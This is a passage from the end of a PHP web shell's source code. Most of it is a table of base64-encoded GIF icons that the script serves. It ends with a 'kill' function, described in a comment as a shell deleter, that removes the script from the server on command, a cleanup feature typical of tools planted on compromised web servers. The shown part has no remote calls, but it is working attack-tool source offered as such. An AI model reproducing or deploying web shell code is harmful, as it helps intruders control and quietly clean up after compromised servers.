"0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0I GlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4 VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY 29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2H nTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f 317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM //MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz// 8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8x mAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZ pnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJk AmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/ 2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP /ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZ jMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzAC ZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AA LsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgA AiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluI HRoZSBwdWJsaWMg" . 
"ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQ BAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D +VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnku p/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IG lzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE 4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0I GlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYV

M0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // Shell deleter function style(); echo("<form method='post'>"); echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' a ction='$me&act=kill'>"); echo("<input type='submit' value='Delete'>"); echo("</form>"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); } } die(); ?>
